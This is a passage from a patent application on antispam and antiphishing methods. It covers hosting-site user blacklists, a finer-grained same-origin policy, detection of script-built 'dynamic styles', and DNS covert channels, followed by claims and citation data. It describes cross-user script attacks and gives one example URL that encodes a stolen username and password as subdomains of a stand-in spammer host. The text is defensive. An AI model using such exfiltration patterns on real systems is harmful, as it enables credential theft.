For reasons of computational and network efficiency, the Agg might not tell WH whenever every new instance of the page is seen. The Agg or WH might have an agreed upon policy saying that WH be told only every 10 instances, say. Or, furthermore, that once WH has been told for that URL, that it no longer needs to be notified if more instances are seen by the Agg.
WH might have a policy of only submitting a subset of URLs to the Agg. For example, it might only do so for free users. Or for free users whose accounts have existed for less than 30 days.
While we have described using the Agg as a search engine, its role is far easier than that of a general purpose search engine. It does not have to spider and record all or most of the pages on the network. It decides which web hosts it will do its searching for, and they tell it what to spider on their websites. Plus, when the Agg finds an answer to a query about a URL's page, there are only two possibilities. Either 0 results, which means the page is canonically new to the Agg, or 1 result, which means there is already 1 BME at the Agg, for that page. Whereas a general search engine may have thousands of results for a query, and it has to expend considerable effort in applying a ranking system to return a subset in an ordered list that the user is likely to find useful. That ranking may have subjective elements. Whereas our situation has an objective binary response. This parallels the other tasks performed by the Agg in the Antiphishing Provisionals.
There is a nuance on this, if the Agg searches for BMEs similar to a given BME for a submitted URL. Then, instead of just the binary result for an exact match, there might be an arbitrary number of similar results. But even here, this situation is still simpler than for a general search engine, since the similar results are objectively found.
The searching for similar BMEs might be something that the Agg does for its own internal analysis. Or perhaps WH might ask for this to be done. Either if no exact match to its URL's page is found, or even if such an exact match is found. If so, then some subset of the similars might be sent to WH. Or the result of some function of those similars. For example, the function might simply to tell WH that some number of similar BMEs or pages were found, across various websites. Here, the number of similar pages would be the sum of the totals of the pages in each of the similar BMEs.
When searching for similar BMEs, or even exact BMEs, this might also be done over a set of BMEs found from messages. The idea is to see if parts (or all) of the text of the page in question also appear in messages. In general, whatever the sources of a BME, it is a measure of whether a block of data (web page or message) has been by others.
A variant on the above idea of using an Agg is that different web hosts peer with each other, in order to exchange and use such information. This follows the idea in "0046" of various message providers exchanging BMEs derived from their message feeds, in order to better see which messages are bulk. There, the use of BMEs was to protect the privacy of the original messages. Here, this is less of an issue, since most of the URLs point to pages that will be or are already publicly available.
Along these lines, suppose WH has a user who writes a page that is meant to sit behind a password. So the page is meant to appear only if the visitor has earlier furnished a valid username and password (or maybe just a password). Assume here that WH permits a user to have such pages and the password capability that these imply. For privacy reasons, if an Agg is used, WH might not wish to have it be able to read this page. (Though perhaps it might, according to its Terms of Service with its users.) Then, as in "0046" with messages, WH might have software that makes a BME out of the page, and sends the BME, instead of an URL, to the Agg. Here, the BME might be considered a degenerate BME, inasmuch as it wraps only one page. Then, the Agg looks in its data to see if it has any BME with the same hashes. If so, it replies accordingly to WH.
Another variant on this section is that WH allows the immediate publication of its users' pages. But it then also does the above tests, or sends the URLs to the Agg to do so. And later, if a page is found to be spam or phishing, it is taken off the network. With possibly other pages by that user.
In either the case where WH immediately publishes pages, or waits till the Agg analyses them, there is yet another advantage of the Agg over a general search engine. When someone uses a browser to ask the latter engine, she expects a rapid reply, taking at most a few seconds. Thus the general search engines have had to heavily build up their hardware, network and methods to meet this need. However, the time constraints on the Agg are far more generous, in the context of antispam or antiphishing.
Suppose WH immediately publishes the pages. It wants to know from the Agg, as soon as possible, when these might be spam. Suppose the spammer sends out a million messages, pointing to a given page, Rho, and that these messages reach their destinations at the instant that WH publishes Rho. For WH, this is the most time constrained arrangment it faces. But the limiting factor is a combination of these items: Not all the recipients will be currently logged in. Of those that are, not all will immediately read their mail. At some destinations, antispam methods might put the given spam into a bulk folder or have deleted it. The recipients who are reading mail will be less likely to read those in their bulk folders. Finally, for spam that is actually read, not all will click on the link to Rho. For the latter, the response rate to spam is usually less than one percent. For a spammer to make money, Rho needs to be available for as long as possible, because of all these issues. At least several hours, preferably days. Hence, suppose WH gets a reply from the Agg that Rho is spam, and this takes 10 minutes, whereupon WH shuts down Rho. That interval is two orders of magnitude less than having Rho be up for a day or more. If the income that the spammer would get from Rho is roughly proportional to the time that Rho is accessible, up to some maximum time interval, then WH has reduced the income by two orders of magnitude. And this interval of 10 minutes is in turn two orders of magnitude longer than the typical response time of a general search engine.
The above estimates are qualitative. But they should suffice to show this advantage of our Agg search engine over a general search engine.
The Agg also has an advantage, this time with respect to ISPs applying antispam methods against incoming messages. Consider the above, where a spammer sends out perhaps a million messages, that point to a page Rho at WH. The Agg (or WH if it is not using the Agg) applies some antispam method against Rho. If essentially the same method is used by the ISPs which get the spam messages, then collectively those ISPs have to do a million times the computation done by the Agg (or WH).
Given the easier computational constraints on the Agg, compared to ISPs analyzing messages for spam, the Agg might thus be able to apply more intensive analysis. Including, but not limited to the following:
a. If the Agg uses our Antispam Provisionals, but now applied to web pages, it might make more hashes, compared to an ISP on a message. This allows for a finer grained test for similar entities.
b. The Agg might follow links in the page, to see if the destinations are in a blacklist. Because of the possible relatively slow response when one goes out on the network via a link, this may be prohibitive when processing messages. But for pages, it may be feasible.
c. A spammer who writes a page might put an image, in which text is written as a bitmap. This evades content filters that operate on explicit text data. Some spam messages already do this, and it can be expected that spam pages might do likewise. Hence, the Agg might apply Optical Character Recognition methods against images in the page, to try and extract text. In general, for messages, this is too intensive and hence slow to be typically used.
In this section, we have described the Agg acting as a search engine, where the Agg performs other tasks described elsewhere in this Invention and in the Antiphishing Provisionals. The method of this section also applies if the Agg just does the tasks described here. 13. Same Origin Policy
Many browsers run scripting languages. Currently, the most common is JavaScript, though others may be possible. Typically, a browser has a code, often called a
"Security Manager", that implements various security policies. One of which might be called a "Same Origin Policy" (SOP). It is meant to prevent a script loaded from website Alpha, when the browser visits a page at Alpha, from reading or changing properties in another window of the same browser, if the latter window is not at an address in Alpha.
In "JavaScript: The Complete Reference" by Thomas Powell and Fritz Schneider, ISBN 0-07-225357-6, McGraw-Hill 2004, Chapter 22, it points out a serious limitation in the above policy. Imagine a user, Mike, with pages at wh.com, under the address http://wh.com/mike/, and another user, Sue, with pages under http://wh.com/sue/. Here, for simplicity, we are imagining a simple format for a user's pages. Then, Mike could write a page with a script that could then access another window pointing to any of Sue's pages. The reference says that there is no known solution to this problem.
In the context of this Invention, it can be seen that this problem is really two problems. First, being able to identify a web hosting site. Second, knowing a user's scope in the addressing scheme for that site. Hence, if the browser has a list of major web hosting sites, and those publish their f() mappings that define their users' scopes, then the browser could enforce an SOP that is now fine grained down to the level of each user. Here, the browser might either get f() directly from the sites, where its list of sites might be hardwired, or it might use an Agg.
We explain why it is advantageous to solve this problem. It could be considered a cross-site scripting attack, except that here the action is within one site. Mike can attack Sue or visitors to Sue's pages, where Sue can be any other user of WH. Suppose he attacks Sue. This could take various ways. If Sue has a page where the visitor reads some information, Mike might try to alter the text, and change whatever impression Sue is trying to make. Possibly damaging Sue's reputation by giving misleading information under her apparent name.
Or, suppose Sue's page has a form that the visitor types in some data. Mike might add or change that data, such that when it is submitted to WH's server, an attack (like a buffer overflow or SQL injection) is done. Here, the attack probes whether the WH server guards against these. Plus, if the server hands off the data to code that Sue supplies, the attack might be against that code.
Another possibility is if Sue has pages that are not publicly viewable. Maybe she requires a visitor to login with a username and password, using a page with https. Then, assuming the visitor logged in, subsequent pages also use https. Currently, the SOP requires that both browser windows use the same protocol. Hence, Mike might have his page with an https, but not require any login. Then, his script can then access another window with Sue's private pages. Here, Mike's code might "merely" copy those pages over the network to some address (probably outside wh.com) controlled by Mike. Or, the script might also actively alter the page or information submitted to it, in the manner described above.
Why might Sue have private pages? Perhaps she is performing e-commerce at wh.com. For a hosting site, e-commerce users might be higher margin than a generic user who is not doing transactions. By the site being able to offer transaction processing, it is likely to be able to change Sue more than a generic user.
Thus far, Mike is attacking Sue or WH. He might also garner information about a visitor, without attacking Sue or WH. For example, if his script can read a form that the visitor fills in on Sue's page, that might have personal information about the visitor. Mike could harvest this, perhaps for identity fraud.
Note in the above examples that some of these attacks might not be possible in a particular combination of browser and scripting language. But browsers and scripting languages change over time, and new scripting languages might emerge. Some or all of the above attacks may be possible now or in the future. Plus, consider a particular browser and scripting language. Suppose one of the above attacks cannot be performed in this environment, assuming correct operation of the browser. But the browser may have a bug, which turns out to enable the attack, in the absence of our method. It is a practical reality that all the major browsers (Internet Explorer, Mozilla, Firefox, Opera, etc) have had bugs, and this might not change in the future, given the ever increasing complexity of browsers. Hence, provided that the hypothesized bug does not invalidate the browser using our method, then the method has merit, in acting to prevent the attack.
It might be asked - what are the chances that a visitor to Mike's page at WH will also visit Sue? One way might be for Mike's page to open a new window, at Sue's WH address, while the script in the original window then might try to access it. Or, Mike's current page might open a new window, which has the attack script, while the current page tells its window to go to Sue's address. The latter method then might have Sue's page existing in a window before the script runs in another window. This might also have the script window being minimised or made transparent, so that the visitor is unlikely to see it. Mike's method might amount to a Man In The Middle attack.
The above should illustrate the current dangers of a scripting attack within a web hosting site. And it should show the usefulness of our method in preventing this.
Another useful extension of the idea of this Section is in dealing with cookies. Most browsers only let a script from a domain read and write cookies from that domain. But for WH, this means that any user who reads or writes cookies can have those read or altered by a script located at another user's page. A user's cookie has no protection from others at WH. But if our method were implemented, a browser could enforce that a user's cookie can only be read or written by scripts at her pages.
Another advantage of our countermeasure is that it can be done automatically, i.e. by default , by the browser. This gets around configuration policies that have to be set manually by someone at the browser. (Quite aside from current browsers not being able to handle the above steps in our method that know about the user scope in a given hosting site.)
We have discussed using our method for major web hosting sites. But an important extra usage applies to financial websites. Imagine a bank, BankO, with the website bankO.com. It has pages that are publicly viewable with http, and login pages that use https. Plus, if a customer logs in, she then sees pages with her account information, that use https. BankO might have several computers for its web servers. These access various databases. Different departments might control different computers. Some of this is for redundancy. But another reason is security.
Suppose the logins are at https://bank0.com/secure/, with subsequent successful logins returning pages starting with this address. Now imagine the marketing department having pages at bankO.com/market, where these might use http or https. If the department was subverted by someone, Mike, who could change pages, then he might use the above scripting attack to get customer information. And possibly to initiate false transactions, if the visitor logs into her account. This attack is also more likely, and lucrative, than the general case of a hosting site, because for a bank, a visitor is more likely to have several windows visiting different bank departments.
In response, BankO might publish subdivisions of its web addresses, like "secure" and "market". These correspond to the users that we have discussed in the bulk of this Invention. Then, the browser, possibly using an Agg, might apply these subdivisions just as it did for users. Here, there would be a list of major banks, and each bank would publish this information about itself. The difference from a Partner List of "2245" is that this new information is about internal entities.
Here, we discussed banks. Clearly, the method could be applied to any major corporation. Also, for BankO, we used the example where its subdivisions were to the right of its domain. With trivial changes, our method could also be applied when BankO has subdomains, like secure.bankO.com and market.bankO.com.
14. Dynamic Styles
In "1174", we discussed "styles" or heuristics, that can be used to characterize an electronic message or web page. Some of these styles are generally known to antispam practitioners. For instance, if a message has invisible text, which is where the foreground color of the text is the same as the background color. While other styles are derived from our inventions in ["0046", "1745", "5037", "1899", "1014", "1174" ], namely in the canonical steps leading to the making of Bulk Message Envelopes (BMEs).
In "1698", we explained dynamic hyperlinks and how these could be used to evade a simple application of a domain blacklist against links in the body of a message. We also described there how the text, or a subset of the text, of a message might likewise be dynamically constructed. We called that a Dynamic Text style.
These two ideas can be combined, and applied to messages or web pages. For many styles, defined in "1174" and in the other Provisionals, it might be meaningful to define corresponding "Dynamic Styles". (The styles defined in "1698" are already "dynamic".) These could be considered special cases of Dynamic Text. Just as a spammer might use a dynamic hyperlink to evade a simple use of a blacklist, so too might she generate a Dynamic Style, to evade a simple detection of that style in the message or page.
For example, consider again the invisible text style. The spammer might attempt to write a scripting routine that sets the background color of the document. Possibly, if not probably, where the routine is written in a deliberately complex manner, to defy a trivial programmatic analysis that reveals the output color, where this analysis does not execute the routine.
Hence, our method in "1698" of using master-slave threads to try to extract hyperlink values can be used here with trivial modification, to search for Dynamic Styles. Every Dynamic Style implies a Dynamic Text style. But the Dynamic Styles give us a more precise understanding about what is varying in the Dynamic Text.
A further refinement is to classify a Dynamic Style as Wrapped, Local or Remote. Here, a Wrapped Dynamic Style has a routine which only uses input values that are in the document. A Local Dynamic Style has a routine which can also use input values that are derived from the machine running the routine, but not from other machines. Whereas a Remote Dynamic Style can also use input values derived from other machines on the network.
It should be noted that a Local or Remote Dynamic Style might be prohibited by a given browser that runs the given language in which the style's routine is written in.
A Local Dynamic Style might use the machine's clock as a seed value for a random number generator, for example.
A Remote Dynamic Style might access web pages or Web Services or data files on other machines. As cautioned in "1698", the remote machines that are accessed might or might not be under the control of the document's author. Hence, care should be taken about whether to add those machines to a blacklist or not. However, if a remote machine is already on a blacklist, then this could be used to make an extra style; one that suggests the document is bad.
Suppose, instead, that the remote machine is a major web hosting site, which uses the main idea in this Invention of publishing the mapping from files to a user, f(). If the remote access is to a user on a blacklist, where this blacklist entry is done in the manner of Section 6, then we could make an extra style, in the fashion of the previous paragraph, to label the document as bad.
Suppose the user is not on a blacklist. Then, if from other styles or other analysis of the document, it is classified as bad (spam maybe), this can be used as a style that is attached to the user. To possibly decide if the user is bad. Here, the inference could be that the document author is the same as the user, and has written data into the user's pages, to be used by the document in its scripting routines; perhaps to avoid simple antispam analysis of that document.
Suppose a slave thread is executing a scripting routine, that turns out to be a Remote Dynamic Style. When it makes a network connection, it should emulate a browser if normally a browser would run the routine and pass information to the remote machine, indicating that the "agent" making the request is a browser. This prevents the remote machine from customizing its reply if it considers the agent to be an antispam entity, as opposed to a normal browser. Similarly, when the thread runs the routine, and the routine calls a function that is normally available to it in a browser, asking for information about the local machine, then the thread should implement that function, and return a typical reply, as though it were a browser. This acts against the routine having logic that tries to determine if it is being run in an antispam thread.
It might be thought that Remote Dynamic Styles could be stopped, simply by prohibiting a document, when it is loaded by the browser, to run routines that do remote access. Or, if the document is a web page, to restrict remote access to only that page's domain. But in the long run, this policy may be too crude. As electronic messages and web pages become more complex, there may be an increasing trend to encode programmatic functionality into them. Instead of them being simple static documents. This increased functionality could well involve general access to the network. If so, then spammers can be expected to take advantage by making documents with various Remote Dynamic Styles.
In the above, when we discussed a Dynamic Style having a routine written in the scripting language, there could in general be several routines that are called, in the making of that style. But, without loss of generality, and for simplicity, we just referred to a single routine for a style.
15. Detection of Possible Covert Channels
In the previous Section, we discussed Remote Dynamic Styles. One important special case involves the detection of possible covert channels. A covert channel is a means by which malware running on a machine sends data to another machine, and the transmission is done in a manner to make this non-obvious to simple external inspection. An elementary example involves web bugs or web beacons. This is where a spam message addressed to e.g. larry@somewhere.com has an <IMG> tag that loads an image from the spammer's domain. The URL in the tag has, to the right of the domain name, an encoding of that email address. So when Larry merely reads the message in his browser, the spammer knows that his email address is valid and active, because the spammer's web server log will show that URL request. In this example, there is no scripting. Each spam message is fully static.
A Remote Dynamic Style arises when a network address, either for incoming like the above, or for outgoing, like a clickable link, is made using a script. The script may also or probably encode information derived about the local computer or its user, into the address. This might be done to the left of the spammer's domain name, as above. Or it might be done to the right. The latter is a DNS covert channel. For example, suppose the spammer's domain is spammer.com. If she runs the DNS server for that domain, then any queries from anywhere on the Internet for a subdomain may come to her DNS server. The subdomains might be information found by her spam messages' scripting routines, encoded as valid domain name characters. So, if one of her message's script runs and somehow finds a username ("lucy") and plaintext password ("dukδim"), it might write an <IMG> tag that has
http://lucy.duk8im.spammer.com/...
Then her DNS server can decode the username and password, possibly in conjunction with other information that is present in the address (maybe to the right of the domain name). The DNS server can then return the raw address corresponding to spammer.com, regardless of the subdomain values. (In practice, her script would encode the data so that the encoded characters are valid in a domain name. This step was omitted above for simplicity.) Of course, in addition or instead of using the <IMG> tag, other tags with links, like <a href=...>, might be used.
The information written into the script might also be about data external to the computer on which the browser is running. For example, in Section 13 we discussed how a script loaded from a page at a web hosting site might access data about other pages from that site, which could exist in other windows of the browser. Where, in general, those pages would belong to other users, and might not typically be publicly accessible. The mechanism in this Section lets the spammer encode such information and pass it out over the network to the spammer. Note here that the dynamic address with this information need not necessarily go to the spammer at the web hosting site. In general, she could use another domain to receive the information.
It is very difficult to prevent a DNS covert channel, because DNS access is a fundamental underpinning of the Internet. In "1698", we discussed a spammer using a script to make a dynamic link in order to avoid a blacklist being used against static links. There, it was the base domain ("spammer.com") which was the key item to obscure. Here, we suggest that the detection of subdomains and the parsing of the path to the right of the domain, might be used to indicate a possible covert channel.
This can optionally use our BME construction methods of "0046". A given BME is made from one or more messages (or web pages) that, after canonical steps are done, resolve down to the same hashes. Suppose we apply our method of "1698" to run the scripts in 2 messages for a BME. Each writes an address that goes into the same tag in the displayed messages. But we find that the addresses are different, though with the same base domain of the spammer. The different addresses (for the same tag) might set a Boolean style suggesting a possible covert channel. We might define 2 styles. One would be for a possible DNS covert channel. The other for a possible path covert channel.
Here in the running of the scripts, our slave process, which emulates a browser, might emulate different browsers. It might also emulate system clock times that are different by days. Plus, the emulation might extend to emulating various other aspects of an operating system, like versions of that system, or of different operating systems. If scripts arise that are virus-like, that attempt to subvert an operating system and extract user data, then the slave might ultimately be a virtual operating system. With deliberately variable dummy user data, in instances of the slave running different messages for a BME. Or, the slave might be the same virtual operating system, but with different dummy user data. Plus, the slave might emulate having other windows open, where those might be showing pages (perhaps simulated pages) from a web hosting site.
If the tag is for an image, we can download the images, by pretending to be a normal browser, and compare them. If these are the same, or they differ only in the low order intensity bits or in some other way so that somehow, the images are programmatically considered to be negligibly different to a human observer, then there might be a convert channel in use. Because why have different addresses that give basically the same image?
Another method avoids the use of BMEs. Instead, given a message with dynamic addresses, this might be run several times by the slave. Each time possibly with the slave pretending to be different operating systems or having different data.
But the BMEs are useful. They give an indication of which messages to analyze with our methods. The BMEs with large numbers of messages are likely candidates. Because these are already consuming more system resources and recipients' attention.
For incoming or outgoing links made dynamically, there is always the possibility that the spammer is deliberately writing spurious random data into each instance of these addresses. Perhaps to throw off the above analysis. So the convert channel style might be a tentative diagnosis. Which may then warrant more intensive study. Like comparing more messages for the same BME, to see if patterns can be discerned in the addresses. Maybe also looking at other BMEs with dynamic links to the same base domain, to see if those have the same behavior. If we do not make BMEs, but are just considering messages, then we can similarly look at other messages with dynamic links to the same base domain.
However, even if the spammer is writing random data into the addresses, this in itself can be considered suspicious. She is doing this dynamically. If the main reason is to avoid a blacklist, then once the dynamic address has been evaluated, either by a browser in its normal operation, or by our master-slave method of "1698", it is trivial to resolve down to her base domain. Random subdomains or random material to the right of the domain are easily discarded once the address is available. So the randomness may suggest that this conceals information. Or that other messages sent by her have information in the random dynamic addresses. And that possibly she might send some messages with random dynamic addresses that point to her domain, where the random portions encode no information, precisely in order to throw us off the trail of her other messages which do encode information.
In the above description of the DNS covert channel, we used the case where the spammer owns the target domain, and also the DNS server for that domain. Another possibility is where the spammer has subverted a DNS server for an innocent domain, and can access the DNS logs and thus extract any encoded information in the DNS queries. Our method above can also be applied to this case.
16. Future Web Services
Currently, most users' web pages are for a manual, visual perusal by a human visitor, as suggested by the common choice of "page" to describe an HTML document. The promise of Web Services is that a new type of offering will appear on the network, and which does not supplant web pages. While the definition of what a Web Service is or might be varies in the computer industry, the following qualitative description should be acceptable. A Web Service is a computer program that accepts input from one or more computers on the network, and provides output to one or more computers on the network. The input and output messages might be written in XML. The input computers could be different from the output computers. Another important characteristic is that Web Services are meant to be easily aggregated into larger Web Services. A building block approach.
If this becomes common, then we anticipate that many programmers might have their own Web Services, located at their personal or work domains. But just as users' web pages today might sit at a web hosting site, so too might arise hosting sites for Web Services. We can also expect that some users will have several, perhaps many, Services. And just as web hosting sites have been used by spammers, so too will Web Service hosting sites. That is, malicious Web Services can be expected to exist within those sites. How these are deemed to be malicious is outside the scope of this Invention. Instead, we describe what could happen after a given Service is found to be malicious. Let this be called Phi. And let it be located at WSH.com.
This determination might likely be done by other Web Services that use Phi. Then, one crude possibility is that those Services blacklist WSH.com. But if it is a major site, then this might be unacceptable, if it has many other valid Services. Instead, we suggest that WSH publishes a mapping f(G)=U from a Web Service G to its owner, for all Services on its site. As was done in Section 2 for web pages. Then, other Web Services might construct a blacklist entry that can be represented symbolically as WSH.com/UO, where UO is the owner/author of Phi.
We choose this notation here to be similar to our notation in Section 6, though an actual instantiation of notation by others might be different. Here, the data to the left of the V designates a network address of WSH. (It could have several.) Where this address is presumed to uniquely distinguish WSH from other entities on the network. While the data to the right designates an identifier of the owner, where this identifier is presumed to be unique at WSH. The combination of these data uniquely specifies a given user at WSH with respect to any other users at any Web Service Hosting sites. Of course, the use of V is purely arbitrary.
Currently, the various Web Services frameworks do implement some forms of security. (Notably the eponymous WS-Security standard.) But these often primarily concerns authenticating or encrypting the messages between Services. (Cf. "Service- Oriented Architecture" by ErI, Prentice-Hall 2004, ISBN 0131428985; "J2EE Web Services" by Monson-Haefel, Addison- Wesley 2003, ISBN 0321146182; "Real World Web Services" by Iverson, O'Reilly 2004, ISBN 059600642X.) There is little if any consideration of deliberately malicious Services. Analogous to the devising of TCP/IP and email protocols in the 1970s and 1980s, where all parties were trusted, and there was no economic incentive for phenomena like spam or phishing.
It might be considered that WSH could apply analysis to Web Services that are to be posted on its site, to test for validity. Indeed, there is a market niche for some such sites to do intensive scrutiny and hence implicitly or explicitly validate that their Services are real. This might appear to obviate any need for our method.
But it can be expected that there will be sites unwilling or unable to do such analysis. If WSH wants to attract as many customers as possible, it cannot charge them much. Indeed, just like there are free email providers and free web hosting sites, there might well be sites like WSH that offer a free posting of Web Services. The manual analysis of a Web Service can be very labor intensive, and requires highly skilled programmers. This essentially assumes that the source code of the Service is available to WSH. But, as we described in the context of dynamic hyperlinks in "1698", source code can be deliberately written to be difficult to understand.
Also, some users at WSH might baulk at showing it their source code. Preferring instead to hand over executable versions of their Services. Some instances of WSH might insist that as a condition of usage, the source is made available. Which still presents the above analysis problems to WSH. But suppose that WSH does not insist on source code. Given an arbitrary executable, its testing cannot be guaranteed to be exhaustive. The Service might work correctly most of the time. But it could have triggers for malicious activity, and testing might not find these. Plus, if WSH hosts a wide variety of Services, then such testing might have to have a heavy manual component.
All of which means that if WSH exists, then it will inevitably attract malicious Services, that it cannot screen out at an affordable cost. Note that the method of this Section is independent of the protocols used by the Web Services. So if the network is the Internet, the protocols are not restricted to http and https. Though a given implementation of a blacklist entry might also associate with it specific protocols. Or port number/s. The above notation could be suitably generalized to handle these cases.
Also, the network is not restricted to the Internet, but designates any type of electronic network in which Web Services are used. Plus, we have used the term Web Services in conformance with common parlance. But our method applies to programs that behave in this manner, even if the term Web Services is not commonly used to describe them.
17. Instant Messaging Bots
As Instant Messaging (IM) has become popular, so too have arisen "bots". These are software programs that act as "users", interacting with human users via IM. Some bots might be run by the IM provider, and explicitly tell their interlocutors that they are bots. Other bots might be established by human users, who are spammers, and who use these bots to send out many spams to other IM users. An IM provider might prohibit this as a matter of policy. Which means if it gets complaints about a user being a bot spammer, then it would eject the user. But it might also want a technical means of finding a bot, to minimize complaints from users.
Another case is if various users, where here we mean humans, might want their own means of detecting if an IM is from a bot. Perhaps if their provider does not have a technical means of doing so that is effective. Or they want to augment such methods with their own.
In the first case, the provider can apply our BME methods of "0046" to a sample of messages from its users. While in the second case, the users might have an extension to their program that reads and writes IMs, which lets each user find BMEs and pool these in a p2p manner that preserves their privacy. Since the original texts are not shared; only the canonical XML representations. For both cases, the BMEs might be only for messages received by users in a new "conversation". Since a bot would have some ability to respond to users' replies, and since those replies could be any written text, so too might the bot's responses. So the latter might be low frequency messages, while its first set of messages (probably advertising something) are more likely to map into just a few BMEs (ideally just one).
In either case, just as for electronic mail or web pages, it is straightforward to find
BMEs that have the most numbers of messages. Note that in general an IM could have hypertext. And the program that shows IMs would typically have the ability to either show such hypertext in a browser-like manner, or even direct such a message to a browser. Various methods in the Antispam and Antiphishing Provisonals could be used to ascertain if a user is a spam bot. Here, this should be taken as meaning that the user sends out many messages that are considered to be spam. The spammer might actually still use this user account to interact in a non-bot manner with other users. It might be difficult to programmatically isolate such messages from regular IM. So the focus is on finding the many spam IMs that the bot would initially send out.
If the users are peering together, then they can use the above method to find bots, and then complain to the provider and possibly add the bots to their blacklists of unwanted users. The latter might be done if the provider takes too long to remove the bot, or disagrees with the users' assessment that another user is a spam bot.
Currently, most IM communities are each run by a single provider. The major providers have mostly resisted efforts to open up messaging between users on different providers. Suppose this changes. So now a user has an IM program that can send and receive messages from users at various IM providers. By using the above peering, she might have a blacklist, where now an entry designates a provider and a user address at that provider. This avoids having to blacklist all the users at a provider. Possibly, her provider might also run the above method, now extended to apply to IMs incoming to the provider from other providers. The provider could then amass a blacklist of bot users at other providers and make this available to its users as a service.
18. Summary
The above has given many details and instances of the application of our Invention. In broad terms, we can generalize it as follows:
Make a set of major web hosting sites. From each, find a mapping from a URL going to that site, to a user who wrote the page that is referred to, for all or most such URLs. Then, find from the site various information about that user, where some of the information might be independent of the user's pages, and some of it extracted from those pages. This grouping of {URLs, user, information} can then be used by external entities, like an ISP or search engine. The ISP might use it to improve its antispam methods. The search engine might use it to improve its classification and rankings of the URLs.

Claims

Claims:
1. A method of a website (WH), that hosts users who write their own web pages, publishing a mapping f(URL)=User that goes from an URL at that website to a string (like a username) that uniquely designates a user at that website.
2. A method, using claim 1, where the publishing is done as a Web Service.
3. A method, using claim 1, where the website publishes ancillary information about its users, including one or more of the following: whether a user is a paying customer, whether her real name has been verified, the number of complaints about her, how long she has been a member, the number of web pages written by her.
4. A method, using claim 3, where the publishing is done as a Web Service.
5. A method, using claim I5 where a message provider generalises a blacklist, by not having the website in its blacklist, but using the mapping f() to maintain a list of blacklisted users, and applying f() to addresses in links in incoming or outgoing messages.
6. A method where a message provider derives the mapping f() from an URL to a user, for a web page hosting website, and has a list of blacklisted users, and applies the mapping to addresses in links in incoming or outgoing messages.
7. A method, using claims 5 or 6, where the message provider periodically informs WH about the latter's users that the former has deemed to be spammers.
8. A method of WH using an URL encoding that designates whether a user is a free or paying customer.
9. A method where a central website (Agg), maintains a list of large web page hosting sites, and the mappings {f()} of each to a designation of its users.
10. A method, using claim 9, where the Agg applies various tests, some possibly manual, to validate that sites in that list are considered reputable by the Agg.
11. A method, using claim 9, where the Agg furnishes this information to message providers.
12. A method, using claim 3, where a search engine (S) uses the information made available by WH as additional input into weightings for users' webpages.
13. A method, using claim 9, where if the Agg determines that a user at WH has phishing pages, then it asks WH to close that user's account.
14. A method, using claim 13, where WH uses various methods, including making Bulk Message Envelopes for its pages, to see if it has other users with similar phishing pages.
15. A method, using claim 9, where a browser accesses that information from the Agg, and uses it in some manner.
16. A method, using claim 15, where a browser uses that information to implement a fine grained Same Origin Policy when showing pages in WH, to prevent scripting code in one user's page to act on any other windows of the browser, that are showing pages from another user at WH.
17. A method of a website (WSH), that hosts Web Services written by its users, publishing a mapping from a hosted Web Service to the user responsible for it.
18. A method, using claim 17, where this is done as a Web Service.
19. A method, using claim 17, where other entities can use the information to maintain a list of blacklisted Web Services or users at WSH.
PCT/CN2006/003727 2005-12-31 2006-12-30 System and method for generalizing an antispam blacklist WO2007076714A1 (en)

Applications Claiming Priority (4)

Application Number Priority Date Filing Date Title
US76612505P 2005-12-31 2005-12-31
US60/766,125 2005-12-31
US61693606A 2006-12-28 2006-12-28
US11/616,936 2006-12-28

Publications (2)

Publication Number Publication Date
WO2007076714A1 true WO2007076714A1 (en) 2007-07-12
WO2007076714A8 WO2007076714A8 (en) 2007-09-27

Family

ID=38227915

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2006/003727 WO2007076714A1 (en) 2005-12-31 2006-12-30 System and method for generalizing an antispam blacklist

Country Status (1)

Country Link
WO (1) WO2007076714A1 (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
EP1968264B1 (en) * 2007-02-28 2018-10-24 Strato Ag A method of filtering electronic mails and an electronic mail system
CN115037526A (en) * 2022-05-19 2022-09-09 咪咕文化科技有限公司 Anti-crawler method, device, equipment and computer storage medium
CN115037526B (en) * 2022-05-19 2024-04-19 咪咕文化科技有限公司 Anticreeper method, device, equipment and computer storage medium

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US6085242A (en) * 1999-01-05 2000-07-04 Chandra; Rohit Method for managing a repository of user information using a personalized uniform locator
CN1588879A (en) * 2004-08-12 2005-03-02 复旦大学 Internet content filtering system and method
US20050188036A1 (en) * 2004-01-21 2005-08-25 Nec Corporation E-mail filtering system and method

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US6085242A (en) * 1999-01-05 2000-07-04 Chandra; Rohit Method for managing a repository of user information using a personalized uniform locator
US20050188036A1 (en) * 2004-01-21 2005-08-25 Nec Corporation E-mail filtering system and method
CN1588879A (en) * 2004-08-12 2005-03-02 复旦大学 Internet content filtering system and method

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
EP1968264B1 (en) * 2007-02-28 2018-10-24 Strato Ag A method of filtering electronic mails and an electronic mail system
CN115037526A (en) * 2022-05-19 2022-09-09 咪咕文化科技有限公司 Anti-crawler method, device, equipment and computer storage medium
CN115037526B (en) * 2022-05-19 2024-04-19 咪咕文化科技有限公司 Anticreeper method, device, equipment and computer storage medium

Also Published As

Publication number Publication date
WO2007076714A8 (en) 2007-09-27

Similar Documents

Publication Publication Date Title
Rao et al. Detection of phishing websites using an efficient feature-based machine learning framework
Jain et al. A novel approach to protect against phishing attacks at client side using auto-updated white-list
Kumar et al. Phishing website classification and detection using machine learning
RU2681699C1 (en) Method and server for searching related network resources
Chakraborty et al. Recent developments in social spam detection and combating techniques: A survey
US8615802B1 (en) Systems and methods for detecting potential communications fraud
James et al. Detection of phishing URLs using machine learning techniques
EP2805286B1 (en) Online fraud detection dynamic scoring aggregation systems and methods
US8438386B2 (en) System and method for developing a risk profile for an internet service
US8763116B1 (en) Detecting fraudulent activity by analysis of information requests
US8930805B2 (en) Browser preview
US9654495B2 (en) System and method of analyzing web addresses
US20080250159A1 (en) Cybersquatter Patrol
US20080010368A1 (en) System and method of analyzing web content
Alghamdi et al. Toward detecting malicious links in online social networks through user behavior
US20230040895A1 (en) System and method for developing a risk profile for an internet service
US8782157B1 (en) Distributed comment moderation
Malandrino et al. Privacy leakage on the Web: Diffusion and countermeasures
Gandhi et al. Badvertisements: Stealthy click-fraud with unwitting accessories
